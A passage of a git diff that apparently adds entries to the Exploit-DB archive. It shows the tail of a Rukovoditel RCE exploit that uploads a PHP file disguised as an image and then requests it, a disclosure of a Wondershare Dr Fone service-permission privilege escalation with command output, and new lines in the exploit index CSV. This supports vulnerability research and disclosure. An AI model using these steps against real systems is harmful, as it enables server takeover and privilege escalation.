IbSiMPXboXjwkD2WW41xCpLJJDTUY2GyP1FMuJ06VFrKgAD2lgJ3cHnK4HncyPBNCMpKxJTgpV9NFlnr6pJ22xPwsK8yQXDKI6pkys9sQJEXMLJ%2F6p4r%2BXTaP6jJ8gjFbFk3R5qSuL5cVCB6GWKjEU0UFViSIU7NFC2sbGUlc9odGx629wn8SlHEsFFwmujkidPANqiY0RdDhrabbjXmgOH4ks1kjxTl%2BNYRsTvJsCntC00L8Y3Ldo8VfwrHgWIA8QVCpUDiIcAdov5IXFU4u4R129UskNF%2FB7jqAqMJaYNvCQbRsstXrtnLVEGbg6Eg2g%2BSYYbEuaCWvA5zp6KOMqtqznYPEW9Cp2U82KOPdqAafwqelpaLy6ILiefRK%2BBUnPc1%2Bwt7%2FuiMfw5oMga9VdgKnw2kbk%2FVXh5rRGSdmxcO59EPVqQ2Jv%2B1lfTdmY2%2ByoqMlw%2FwBwHvF%2FVDLw7D003Y%2FC38b%2B8pp2p4m1mIpMeQGw6JtJso9mGBoAkTb2S%2FttgW4lxBaHZdDu3S4KhSrZbstEcbUohzTUcA1rg%2FSZLdAs7j%2BOfxuIbSpAhucF5mRDTLWjzufAJJiuEhrodUdG0l59pWj4F8KiIo0yXf3ER6IuajGrBHF%2BVnoeEqWvy%2BQXmvb%2BoXVYvDRZbnhLXuEuEDX8KwXaum19V2U94f0nXy5roNy2JkSjoyJXy7UEG6iqmdm%2BOIsg6teUsoYrNurwSNUtFxhhWyr69C0FA4GtBTSmZ3QCIshabiyn%2FwBKbUBLbHknNXDg2P55qgUiwjK0HrAXa%2Bj7fBGzhmR2pBHNMalF20TyIsU4o0w8S8eBghTfw0HT13VFC%2BEpTrplK1BzdW%2B0geaGq1cojbY6eX%2FK1fEuEtiRr4rN43BfDEkAnly%2B6nLHJMpDLFoUYhzrDblM%2BaGyknfX66lM6PDnv70fuunBx49E6VCt2w3C1YZAPmmGFINjrt4i8pPSadDa6OwtM6ei6QYm14XLWg7qyu4io5w%2FqbInnyQfCHFxDfD8%2BSauwjnCwUZ9RSP0wFSm6pVOaxm%2B0eHVang%2FDTtpyn8lEN4J3jAvvoneDwIbEgSOUqLTkyvpJFePr%2FBoujYaryPidfM8md16F264gGMyc15fXqSVpiZJs6a4dZ%2Fk7fz5qPwf8h6qhfKlkKGXDaZiUZ8UjRWYamAwQoVKKmzSi7C1ATJt1H2TfDVpsNOv3SLDsM2Gm50CZ03gbyUQDoNkXI9VV8CqD08QLeahQNiZjwt76oqizNE6bn9yj5TO9NEsO2%2F6gOYufoneDa076pc7DgHXyGvmrMO%2FIYA99PS6eE%2FDEnD2i%2FiWG7pWYxXDabhd5BJ3%2BQlbppD2%2FSPukHFsI4WcyRzkg%2Bg1VslPaI47TpmPr4dzM2UhzRo2fC0LlAjuh4yudoLz6lNMRgACSx5Y4i%2BaR4QFfhsHVEEhj7ad2T6eCgumhrQrrYbK5rnjubuFi0%2F5Dl1RNMtL%2B5BHiD8lpv4MOblLRJ1vYTsk2H4O3CudAEPIItqTIDfdLm0tFf8AHpvYz4G0ioDl3WwxTAxo1naNboPs9gAA17rnl15pxjGOcRAA%2FwAje3glxxl4uXRc04udR4AsoODC6Lu238lEHKLj1RGNrBoA1jUyR5SLDzQb8Q46OPg4AjyK5pIVNsyfbzCFzM4JtyK8xqF3Mnx%2By9n7SMaaLg9pFtW39ivI8bw17Zcwioz%2B5u3%2B5uoTRuicwAv8PQKMrhXyYQ01CS0fJfPbHX5eu67g7Nj3O6JaxsXueSSi9i7MSYnwA%2BgCNw7I1t81XWa7%2Bnujpb1OpUcOQ3aT6D7n2XI5jQPAFvMxMesAJhwwtIzEl52E2CQ4hznw39gOvII%2Fh%2BLFOwvtO3kmToDVmhY4umwHlr66rhbDe873t4QNUFWxQYwvefAX8kLwh1Su%2FM6Q1tmjSSflCbTArQ9wpJuCbXnT0G3mranFmhzabpJPLbzXKzxTZA13PU6BZ3D1C7EPB1AbpsBf1v6eJU3Ly9DqPpbNZU4c0iRBB5j6hDN4fTBGgjaYAR1fE%2FDp5heIt05DqrcOGYhoc0CTqFVeX%2FZJuS%2FoEaWC5cD0aCpvomqWkAw3SfqjmcMDdtdUVUeykOsbJXFjKa%2BFmApwLnRdxWPa02hx2k2H2WM4n2myOLXtI5EeyqPFQ6C07D0%2FSVOWVRVDxwuWzQOqPkmd7h0kCeY1b4gkdAradGbjuncatd1EWKXYOu53Uj3CbsMAcjtyPQqSkpdHlFxBOMUyabhOUxvcH1XkWJxfw3uBpw4G%2BUlvnuvZsdem7wO30%2Bi8c4%2FTBcTo4HyLToQdwrwf6ITX7BKmIo1P1Nc0%2FwBwA9wPoq%2F4aj%2F3x%2F6O%2ByCXE9kqNSTYRb5r5rjsiH0e4DOyXvnqpvTNC2hi0tdqZKhXwp12UcM8MufRdxOKLrgfZMKU%2FEkQPT7lfNxTaQzEgu2b9Y%2BSFpYeo8kzlaNY3jZSwlFgqZn338Tt5Lq%2FYb%2FQZh6hd%2FMrWAuxvXnC0fB8U1jLfqJ9AVnq1I1CMo7uwO%2F7JhkcBDbaT5LnaOVM0GFpmo8Oce6BJHhuVn%2BFVM%2BIq1m6fEjxGnoiqLXii7XM%2BRPJql2bwAYXsNpAI8VOrKcH2IIdmaOX0Q%2FB3mnOsX8uYQ2CDnB97h0Ejlsu1GFrgA4kjprshK07DFJqhk3ipa8yTlIge6W4jjJzFoMkGZ6bITEZgTmaYkacuiV4vA5jmbII0I36FSlllwrHFHoxfiBUOctnaPoQjsNw4G4bH%2FIKA4CGkwT3hYg6rStw5iWuIjbZSVyY8pKPC7D4ctEgeSm3EnNlcIG30K%2BoV8wg2PNcxBtBE9Vakloz3b2EEyCF5J2kohlZzDZpJj%2FB28f4nXzXrGHYSJ6XXm%2FbMMfUcBZzfcbHyNvNWxPRLKjH1GEGCoK1zpEHUaHpyVSoRNzw8B1JqA4jSOylwXEHImfww7qg1ZROmZumS39RsoDiJc8Nju8k%2FwATwjNokGJwppOkFLtdKafBnWxOW1sqFo0%2FjElkgDfmgHV7QSi6WOyNAbpuB9U%2BmTpoZYaoaegvpJ08U5wpaRJMmBMb%2BCS0sYxwg26dUbhsGcvdMCPNH1RyVmgwVQFnegE6DkJSXtTxQ0nNLLEub6C%2Fup4J7py72AJ6an5JZ2poZi0cgozybVF4Y9Mf9jcdnzTGbWOY5p1XhzszQPDY%2FZeacCxxpugzykajqtieKGmATDmO%2FrGx%2FwAgmjNNeWLKDTtDTG1csOjo5p2QwImYgHUIKvxHMIInkdiPFcqvygGfIqOSrKwToK4hw5tqtMnNFwN13C401GQHd4DwnoUNS4uGyLR%2BaJdjy4VWvpWB1CRtJWOot6G2Fxb2kgG41a76FNsE51TaOiRYSi97w5y13CsNCRNzdI6dRV%2FQ2jShhleS9qaJbXNQXEmeo3C9gxr4YV55x%2FB5gTC1N%2BaRlUfabPOcRTg201HgqkTjaRa4hDKhB6NbwdkUpTKhUgX33S3g7D8FW1A5cyo5OJAGhJOiUcSwbnXi6JbV2BiEQ089Pn4o9Bww2LwbmnzUqNNzW2uNytXicCKh5jc%2FRUPwEDQxyCXyP6X0yzQ4u1IG%2FXoFpOGcShuUiwi8%2Bv50VQ4Xm0EHdWUsDl7safk%2BKnKTXSsEmOeFYhtR9RznABoEeElBV3tr1jl%2FSLDx5pXXpEERa8ny0C7wbE%2FALXu0c6I%2BqlakW8%2BdlFekKeIIOhhOMe2sGfyntcP6mkd4DmOaFx5biHlzdQdemyJp4R1rd4W%2Fdc3TBVoqw2LqNYJaHTrFh6bFcw9cum5N9Dt0T%2FAYMx3hr0R%2BC4VTzERce6RtvgycUIcPwn4rTcghOOE8NNgdk6p4UMcLI1lEA5hodQh%2FG30V5f0fYbAgBFUSGmykyoEO0HMrpKPDNbl0vxwlhKQYmkHNiFpK7RkISEFdkDjPOO0nDoJIWb%2BEvUeO4IOaVjP%2BndE0J6BkhbsM4Q4%2FCBRcZkPgYFNoHJdbWiVVk0QqHKbXRGGql5gk%2BH3XzL3t4KLxl0uV3A9CXUHD%2Bq2yvpVIF7nQKNCubDL5fcqz4ZJEmDrbZdZ1BdHDEeJ%2FCVVSpAuI%2FCpF%2BUanxOpVrW5QTPJTkUihdxjDMYDz2WS4hXtTZGhK2GOpBzc7jqQADzOgWX4zQBrBjb5bHxWZaZq6hr2cwsSTpBlPeH1W1HcxzHPaVLgNMCjmIuAZHh%2ByE7O04cS3TMbdJRbB2zUUgGiNRt0U8xnTz381RnJMGxGhUatYwDNzZH0T8hWcz3tET8WR4IDDvdbNed0Y4aQipCtHZMgjcI3DHUEXQtSsGiPwKbcQDeU619Eew1wOUrO1nQ4haGk%2ByQ8RZ%2FMQy8sOPtA%2BJbmakv8AAp9Ch8FSTKtGG4Y6WAK80Qd7oXhmiYYZb6tGO6ADTc11zZGYWo0mSVbi2iEmqmNEnCi2M8RijTPcV1HHgkE25%2Fug8Fc3V2LaINtkr0OthWJxIqOpie6XCY36JpiCBfzWX4UP5g8QtBjj3h%2Ft%2Bqm%2BD1TE%2FaCq92Qgw1rp89JVlPh2Qhx3E%2BpRPHgPhf8Ak36JjxQfyR5KL4WT4FYWGsyxflzlC8KDQSWm8mW76q2kf%2Fr%2FANo%2BaTOMYq1vBDWgJXZo3uLiYEGFPD0QBJMrlU2KroG351Rq3sHzQxztjNcRrK7U4nTy2MoSibFBUB3kVKhPF9GP8UXX12V2Ao%2F8LmEAlGkLl%2BW2c9aQWxtkh4i8iotC39Kz%2FFP1hPl%2F1FxdLmXC%2Bhdo6K2FNIZn%2F9k%3D&filename=hello.php + +#we visit the image + +http://localhost/uploads/users/tmp/hello.php \ No newline at end of file diff --git a/exploits/windows/local/51324.txt b/exploits/windows/local/51324.txt new file mode 100644 index 000000000..211da02f4 --- /dev/null +++ b/exploits/windows/local/51324.txt @@ -0,0 +1,51 @@ +# Exploit Title: Wondershare Dr Fone 12.9.6 - Privilege Escalation +# Date: 14 March 2023 +# Exploit Author: Thurein Soe +# Vendor Homepage: https://drfone.wondershare.com +# Software Link: https://mega.nz/file/ZFd1TZIR#e2WfCX_ryaH08C3VNGZH1yAIG6DU01p-M_rDooq529I +# Version: Dr Fone version 12.9.6 +# Tested on: Window 10 (10.0.19045.2604) +# CVE : CVE-2023-27010 + + + +*Vulnerability description*: + +Wondershare Dr Fone version 12.9.6 running services named "WsDrvInst" on +Windows have weak service permissions and are susceptible to local +privilege escalation vulnerability. Weak service permissions run with +system user permission, allowing a standard user/domain user to elevate to +administrator privilege upon successfully modifying the service or +replacing the affected executable. DriverInstall.exe gave modification +permission to any authenticated users in the windows operating system, +allowing standard users to modify the service and leading to Privilege +Escalation. + + +C:\Users\NyaMeeEain\Desktop>cacls "C:\Program Files +(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe" +C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe + +Everyone:(ID)F + +NT AUTHORITY\SYSTEM:(ID)F + +BUILTIN\Administrators:(ID)F + +BUILTIN\Users:(ID)R + +APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R + +APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R +C:\Users\NyaMeeEain\Desktop>sc qc WsDrvInst +SERVICE_NAME: WsDrvInst + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 3 DEMAND_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files +(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare Driver Install Service + DEPENDENCIES : RPCSS + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f39d7631a..f031eb470 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -1583,6 +1583,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16962,exploits/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",webapps,asp,,2011-03-11,2011-03-11,1,,,,,, 34614,exploits/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 - 'frmHelp.aspx' Cross-Site Scripting",2010-09-09,"David Hoyt",webapps,asp,,2010-09-09,2014-09-11,1,,,,,,https://www.securityfocus.com/bid/43110/info 26439,exploits/asp/webapps/26439.txt,"Snitz Forum 2000 - 'post.asp' Cross-Site Scripting",2005-10-31,h4xorcrew,webapps,asp,,2005-10-31,2013-06-25,1,CVE-2005-3411;OSVDB-20421,,,,,https://www.securityfocus.com/bid/15241/info +51323,exploits/asp/webapps/51323.txt,"Snitz Forum v1.0 - Blind SQL Injection",2023-04-07,"Emiliano Febbi",webapps,asp,,2023-04-07,2023-04-07,0,,,,,, 4687,exploits/asp/webapps/4687.html,"Snitz Forums 2000 - 'Active.asp' SQL Injection",2007-12-03,BugReport.IR,webapps,asp,,2007-12-02,,1,OSVDB-39002;CVE-2007-6240,,,,, 24604,exploits/asp/webapps/24604.txt,"Snitz Forums 2000 - 'down.asp' HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",webapps,asp,,2004-09-16,2013-03-06,1,CVE-2004-1687;OSVDB-10070,,,,,https://www.securityfocus.com/bid/11201/info 28566,exploits/asp/webapps/28566.txt,"Snitz Forums 2000 - 'forum.asp' Cross-Site Scripting",2006-09-13,ajann,webapps,asp,,2006-09-13,2013-09-27,1,CVE-2006-4796;OSVDB-28832,,,,,https://www.securityfocus.com/bid/20004/info @@ -3584,6 +3585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38356,exploits/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",remote,hardware,,2013-03-01,2015-09-30,1,CVE-2013-2560;OSVDB-90821,,,,,https://www.securityfocus.com/bid/58290/info 38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,remote,hardware,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58943/info 39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",remote,hardware,,2014-05-08,2016-01-08,1,CVE-2014-1849;OSVDB-106777,,,,,https://www.securityfocus.com/bid/67510/info +51321,exploits/hardware/remote/51321.txt,"Franklin Fueling Systems TS-550 - Exploit and Default Password",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-07,0,,,,,, 49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,,2020-12-18,2020-12-18,0,CVE-2020-26887,,,,, 32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware,,2014-04-08,2014-04-08,1,OSVDB-103289,"Metasploit Framework (MSF)",,,, 4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,,2007-12-17,2018-01-25,1,OSVDB-43168;CVE-2007-6702,,,,, @@ -3893,6 +3895,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,,2018-03-06,2018-03-06,0,CVE-2018-5767,,,http://www.exploit-db.com/screenshots/idlt44500/rootshell.png,,https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/ 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware,,2021-04-21,2021-04-21,0,,,,,, 50916,exploits/hardware/remote/50916.txt,"Tenda HG6 v3.3.0 - Remote Command Injection",2022-05-11,LiquidWorm,remote,hardware,,2022-05-11,2022-05-11,0,,,,,, +51317,exploits/hardware/remote/51317.py,"Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing",2023-04-07,@h454nsec,remote,hardware,,2023-04-07,2023-04-07,0,CVE-2020-35391,,,,, 5150,exploits/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,remote,hardware,,2008-02-17,,1,OSVDB-42179;CVE-2008-0804,,,,, 38242,exploits/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",remote,hardware,,2015-09-20,2015-09-20,0,OSVDB-127948;OSVDB-127871,,,,, 38850,exploits/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",remote,hardware,,2013-11-22,2015-12-02,1,CVE-2013-5912;OSVDB-100273,,,,,https://www.securityfocus.com/bid/63880/info @@ -4491,6 +4494,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17116,exploits/hardware/webapps/17116.txt,"Longshine Multiple Print Servers - Cross-Site Scripting",2011-04-04,b0telh0,webapps,hardware,,2011-04-04,2011-04-04,0,,,,,, 44488,exploits/hardware/webapps/44488.py,"Lutron Quantum 2.0 - 3.2.243 - Information Disclosure",2018-04-18,SadFud,webapps,hardware,,2018-04-18,2018-04-18,0,CVE-2018-8880,,,,, 45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware,,2018-09-10,2018-09-10,0,,,,,, +51315,exploits/hardware/webapps/51315.txt,"MAC 1200R - Directory Traversal",2023-04-07,"Chunlei Shang_ Jiangsu Public Information Co._ Ltd.",webapps,hardware,,2023-04-07,2023-04-07,0,CVE-2021-27825,,,,, 49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,,2020-12-14,2020-12-14,0,,,,,, 35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Ertebat Gostar Co",webapps,hardware,,2015-01-29,2015-01-29,0,CVE-2012-4891;CVE-2012-4889;OSVDB-80874;OSVDB-117694;OSVDB-117566,,,,, 25813,exploits/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware,,2013-05-29,2013-05-29,1,CVE-2013-1605;CVE-2013-1604;OSVDB-93709;OSVDB-93708,,,,,http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities @@ -10685,6 +10689,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28987,exploits/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,remote,multiple,,2006-11-13,2013-10-16,1,,,,,,https://www.securityfocus.com/bid/21040/info 31890,exploits/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",remote,multiple,,2008-06-20,2014-02-25,1,CVE-2008-7184;OSVDB-57877,,,,,https://www.securityfocus.com/bid/29611/info 9915,exploits/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",remote,multiple,3632,2002-01-31,2017-04-01,1,CVE-2004-2687;OSVDB-13378,"Metasploit Framework (MSF)",,,, +51314,exploits/multiple/remote/51314.py,"Docker based datastores for IBM Instana 241-2 243-0 - No Authentication",2023-04-07,"Shahid Parvez (zippon)",remote,multiple,,2023-04-07,2023-04-07,0,CVE-2023-27290,,,,, 34297,exploits/multiple/remote/34297.txt,"dotDefender - Cross-Site Scripting Security Bypass",2010-07-09,SH4V,remote,multiple,,2010-07-09,2014-08-09,1,,,,,,https://www.securityfocus.com/bid/41560/info 5257,exploits/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,remote,multiple,,2008-03-13,,1,CVE-2008-1218,,,,, 30643,exploits/multiple/remote/30643.txt,"DropTeam 1.3.3 - Multiple Remote Vulnerabilities",2007-10-05,"Luigi Auriemma",remote,multiple,,2007-10-05,2014-01-03,1,CVE-2007-5264;OSVDB-41642,,,,,https://www.securityfocus.com/bid/25943/info @@ -10810,6 +10815,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 26966,exploits/multiple/remote/26966.txt,"httprint 202.0 - HTTP Response Server Field Arbitrary Script Injection",2005-12-22,"Mariano Nunez Di Croce",remote,multiple,,2005-12-22,2013-07-21,1,CVE-2005-4502;OSVDB-21916,,,,,https://www.securityfocus.com/bid/16031/info 19466,exploits/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure",1999-08-18,"Gregory Duchemin",remote,multiple,,1999-08-18,2017-11-15,1,CVE-1999-0753;OSVDB-1049,,,,,https://www.securityfocus.com/bid/591/info 19459,exploits/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Remote Buffer Overflow",1999-08-13,"jduck & stranjer",remote,multiple,,1999-08-13,2012-06-30,1,CVE-1999-0679;OSVDB-1043,,,,,https://www.securityfocus.com/bid/581/info +51316,exploits/multiple/remote/51316.py,"IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)",2023-04-07,"Maurice Lambert",remote,multiple,,2023-04-07,2023-04-07,0,CVE-2022-47986,,,,, 38825,exploits/multiple/remote/38825.xml,"IBM Cognos Business Intelligence - XML External Entity Information Disclosure",2013-10-11,IBM,remote,multiple,,2013-10-11,2015-11-30,1,CVE-2013-4034;OSVDB-99742,,,,,https://www.securityfocus.com/bid/63719/info 35918,exploits/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",remote,multiple,,2011-06-30,2015-01-27,1,,,,,,https://www.securityfocus.com/bid/48514/info 20472,exploits/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,remote,multiple,,2000-12-05,2012-08-13,1,CVE-2001-0051;OSVDB-9484,,,,,https://www.securityfocus.com/bid/2068/info @@ -15447,6 +15453,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-20,"Abdullah Khawaja",webapps,php,,2021-09-20,2021-09-20,0,,,,,, 50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,, 50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,, +51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,, 51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,, 15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip, 36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79456,,,,,https://www.securityfocus.com/bid/52115/info @@ -24257,6 +24264,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 8504,exploits/php/webapps/8504.txt,"NotFTP 1.3.1 - 'newlang' Local File Inclusion",2009-04-21,Kacper,webapps,php,,2009-04-20,,1,OSVDB-54124;CVE-2009-1407,,,,, 17296,exploits/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",webapps,php,,2011-05-16,2011-05-21,1,OSVDB-72366;OSVDB-72365,,,,http://www.exploit-db.comNoticeBoardPro.zip, 31902,exploits/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,webapps,php,,2008-06-10,2014-02-26,1,,,,,,https://www.securityfocus.com/bid/29655/info +51318,exploits/php/webapps/51318.py,"NotrinosERP 0.7 - Authenticated Blind SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24788,,,,, 11832,exploits/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,webapps,php,,2010-03-20,,1,OSVDB-63122;CVE-2010-1216,,,,, 36696,exploits/php/webapps/36696.txt,"Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion",2012-02-11,indoushka,webapps,php,,2012-02-11,2015-04-10,1,CVE-2012-1200;OSVDB-79555,,,,,https://www.securityfocus.com/bid/51976/info 36698,exploits/php/webapps/36698.txt,"Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion",2012-02-11,indoushka,webapps,php,,2012-02-11,2015-04-10,1,CVE-2012-1200;OSVDB-79556,,,,,https://www.securityfocus.com/bid/51976/info @@ -28627,6 +28635,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,, 48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,, 51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,, +51322,exploits/php/webapps/51322.txt,"Rukovoditel 3.3.1 - Remote Code Execution (RCE)",2023-04-07,"Mirabbas Ağalarov",webapps,php,,2023-04-07,2023-04-07,0,,,,,, 46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/ 45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip, 46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip, @@ -41413,6 +41422,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,,2019-10-31,2019-10-31,0,,"Buffer Overflow",,,http://www.exploit-db.comallok_wmvconverter.exe, 47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,, 47617,exploits/windows/local/47617.txt,"Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,, +51324,exploits/windows/local/51324.txt,"Wondershare Dr Fone 12.9.6 - Privilege Escalation",2023-04-07,"Thurein Soe",local,windows,,2023-04-07,2023-04-07,0,CVE-2023-27010,,,,, 50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",2022-05-11,AkuCyberSec,local,windows,,2022-05-11,2022-05-11,0,,,,,, 50755,exploits/windows/local/50755.txt,"Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path",2022-02-18,"Luis Martínez",local,windows,,2022-02-18,2022-02-18,0,,,,,, 50813,exploits/windows/local/50813.txt,"Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path",2022-03-09,"Mohamed Alzhrani",local,windows,,2022-03-09,2022-03-09,0,,,,,,